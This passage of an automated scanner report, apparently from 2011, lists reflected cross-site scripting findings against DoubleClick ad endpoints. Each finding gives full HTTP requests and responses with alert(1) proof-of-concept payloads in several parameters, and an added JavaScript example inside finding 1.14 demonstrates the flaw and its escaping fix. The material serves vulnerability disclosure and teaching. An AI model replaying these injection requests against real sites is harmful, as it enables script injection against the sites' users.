2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=3ab7c"-alert(1)-"ad8c3af37fdhttp://content.schwab.com/flash/streetsmartedge/pre-launch/ssedge/intro.html?offer=ssedge");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscript
...[SNIP]...

1.9. http://ad.doubleclick.net/adi/N6036.GoogleFinance/B5133220.11 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.GoogleFinance/B5133220.11

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff78a"-alert(1)-"3582cf30a1 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQff78a"-alert(1)-"3582cf30a1&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=;ord=1859536705? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:03:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7521

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
h4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQff78a"-alert(1)-"3582cf30a1&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=http%3a%2f%2fcontent.schwab.com/flash/streetsmartedge/pre-launch/ssedge/intro.html%3Foffer%3Dssedge");
var fscUrl = u
...[SNIP]...

1.10. http://ad.doubleclick.net/adi/N6036.GoogleFinance/B5133220.11 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.GoogleFinance/B5133220.11

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69442"-alert(1)-"07e6bcbb79d was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-410367935223407369442"-alert(1)-"07e6bcbb79d&adurl=;ord=1859536705? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:04:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7519

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-410367935223407369442"-alert(1)-"07e6bcbb79d&adurl=http%3a%2f%2fcontent.schwab.com/flash/streetsmartedge/pre-launch/ssedge/intro.html%3Foffer%3Dssedge");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";

...[SNIP]...

1.11. http://ad.doubleclick.net/adi/N6036.GoogleFinance/B5133220.11 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.GoogleFinance/B5133220.11

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3c2d"-alert(1)-"a12e235cd32 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1c3c2d"-alert(1)-"a12e235cd32&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=;ord=1859536705? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:04:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7521

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
YXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1c3c2d"-alert(1)-"a12e235cd32&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=http%3a%2f%2fcontent.schwab.com/flash/streetsmartedge/pre-launch/ssedge/intro.html%3Foffer%3Dssedge");
var fscUrl = url;
v
...[SNIP]...

1.12. http://ad.doubleclick.net/adi/N6036.GoogleFinance/B5133220.11 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.GoogleFinance/B5133220.11

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eedea"-alert(1)-"b4205954787 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQeedea"-alert(1)-"b4205954787&client=ca-pub-4103679352234073&adurl=;ord=1859536705? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:04:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7519

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQeedea"-alert(1)-"b4205954787&client=ca-pub-4103679352234073&adurl=http%3a%2f%2fcontent.schwab.com/flash/streetsmartedge/pre-launch/ssedge/intro.html%3Foffer%3Dssedge");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wm
...[SNIP]...

1.13. http://ad.doubleclick.net/adi/N6036.GoogleFinance/B5133220.11 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.GoogleFinance/B5133220.11

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 578f1"-alert(1)-"9cb53d4b6d7 was submitted in the sz parameter; in the request below the payload appears appended to the sa=L value of the click URL rather than to sz=728x90, so the parameter label should be read against the request line. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L578f1"-alert(1)-"9cb53d4b6d7&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=;ord=1859536705? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:03:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7527

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1db/%2a/j%3B235044966%3B1-0%3B0%3B58876509%3B3454-728/90%3B40290298/40308085/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=L578f1"-alert(1)-"9cb53d4b6d7&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1s
...[SNIP]...

1.14. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.15

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69f57'-alert(1)-'ca7e6a01360 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
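Worked example for findings 1.11 and 1.14 (an added illustration, not code from the scanner report or from the ad server). The adi response reflects the value into a double-quoted literal inside a script block (var url = escape("...")), while the adj response reflects it into a single-quoted literal that document.write() then hands to the HTML parser, so in the adj case the same value crosses two parsers. The script below reconstructs both template shapes from the response snippets on the page (an assumption about the real templates), replays the report's own payloads, checks statically and dynamically whether they terminate the literal, and applies the encoding that keeps them inside it. The function names, the stubbed alert()/document.write() sandbox and the 'a"b' test value are assumptions made for the example.

```javascript
// Added example (not code from the scanner report, DoubleClick, or Google): models
// the two reflection shapes shown in the findings, checks whether a payload escapes
// the string literal, and applies the context-correct encoding. Template text is
// reconstructed from the response snippets on the page; helper names and the
// sandbox are assumptions.

// Payloads quoted from findings 1.11 (num, double-quoted literal) and 1.14 (adurl,
// single-quoted literal).
const PAYLOAD_DQ = 'c3c2d"-alert(1)-"a12e235cd32';
const PAYLOAD_SQ = "69f57'-alert(1)-'ca7e6a01360";

// Escape a value for a JavaScript string literal of either quote style: everything
// outside [A-Za-z0-9] becomes \xHH or \uHHHH, so quotes, backslashes, newlines,
// `<`, `/` and `-` can neither close the literal nor be parsed as an operator or tag.
function jsStringEscape(value) {
  let out = "";
  for (const ch of String(value)) {
    const cp = ch.codePointAt(0);
    if (/[A-Za-z0-9]/.test(ch)) out += ch;
    else if (cp < 0x100) out += "\\x" + cp.toString(16).padStart(2, "0");
    else if (cp <= 0xffff) out += "\\u" + cp.toString(16).padStart(4, "0");
    else out += "\\u{" + cp.toString(16) + "}";
  }
  return out;
}

// Escape a value for an HTML attribute. Needed in the adj shape because the JS
// literal is later handed to document.write(): the JS escape is undone at parse
// time, so the HTML parser would otherwise see the raw quote characters.
function htmlAttrEscape(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Shape of the adi response (finding 1.11): script text with a double-quoted literal.
function renderClickUrl(num, harden) {
  const v = harden ? jsStringEscape(num) : num;
  return 'var url = escape("http://googleads.g.doubleclick.net/aclk?num=' + v + '");\n' +
         "var fscUrl = url;\n";
}

// Shape of the adj response (finding 1.14): document.write() of HTML inside a
// single-quoted literal; the value lands in an href attribute inside that HTML.
function renderClickTag(adurl, harden) {
  const v = harden ? jsStringEscape(htmlAttrEscape(adurl)) : adurl;
  return "document.write('<a href=\\\"http://ad.doubleclick.net/click;adurl=" + v +
         "\\\">ad</a>');\n";
}

// Static check: does the first occurrence of `marker` fall inside a string literal?
// Tracks both quote styles and backslash escapes; comments and regex literals are
// not handled (assumption: none precede the injection point in these templates).
function markerInsideStringLiteral(js, marker) {
  const idx = js.indexOf(marker);
  if (idx < 0) return null; // value not reflected at all
  let quote = null;
  for (let i = 0; i < idx; i++) {
    const ch = js[i];
    if (quote) {
      if (ch === "\\") i++;            // skip the escaped character
      else if (ch === quote) quote = null;
    } else if (ch === '"' || ch === "'") {
      quote = ch;
    }
  }
  return quote !== null;
}

// Dynamic check: run the generated script with alert() and document.write() stubbed
// and report whether alert fired and what HTML was written. Lab use only.
function execute(js) {
  const result = { alertFired: false, written: "" };
  const alert = () => { result.alertFired = true; };
  const document = { write: (html) => { result.written += html; } };
  try {
    new Function("alert", "document", js)(alert, document);
  } catch (e) {
    result.error = e.message; // a SyntaxError also means the literal was broken
  }
  return result;
}

// Side-by-side results for the two findings.
function summary() {
  return {
    adi_vulnerable: execute(renderClickUrl(PAYLOAD_DQ, false)).alertFired,
    adi_hardened: execute(renderClickUrl(PAYLOAD_DQ, true)).alertFired,
    adj_vulnerable: execute(renderClickTag(PAYLOAD_SQ, false)).alertFired,
    adj_hardened: execute(renderClickTag(PAYLOAD_SQ, true)).alertFired,
  };
}

console.log(summary()); // { adi_vulnerable: true, adi_hardened: false, adj_vulnerable: true, adj_hardened: false }
```

Encoding every non-alphanumeric character as \xHH is the safe rule for a JavaScript string context and works for both quote styles, which is why the report lists the same parameter twice for the adj endpoint (once per quote style, e.g. 1.14 and 1.15). For the adj shape the value must additionally be HTML-attribute-encoded before the JavaScript escape, since the written HTML is parsed again after the script runs; the example shows a raw double quote in the value surviving into the href attribute unless that outer encoding is applied.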

Request

GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=69f57'-alert(1)-'ca7e6a01360 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7504
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:06:04 GMT
Expires: Thu, 03 Feb 2011 16:06:04 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:41:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
z0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=69f57'-alert(1)-'ca7e6a01360https://www.ally.com/bank/interest-checking-account/index.html?CP=57865895;39213494\">
...[SNIP]...

1.15. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.15

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48315"-alert(1)-"6e66920d7bf was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=48315"-alert(1)-"6e66920d7bf HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7504
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:05:59 GMT
Expires: Thu, 03 Feb 2011 16:05:59 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:41:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
z0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=48315"-alert(1)-"6e66920d7bfhttps://www.ally.com/bank/interest-checking-account/index.html?CP=57865895;39213494");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess
...[SNIP]...

1.16. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.15

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9569'-alert(1)-'6b525c8dbf5 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAEc9569'-alert(1)-'6b525c8dbf5&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:04:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7574

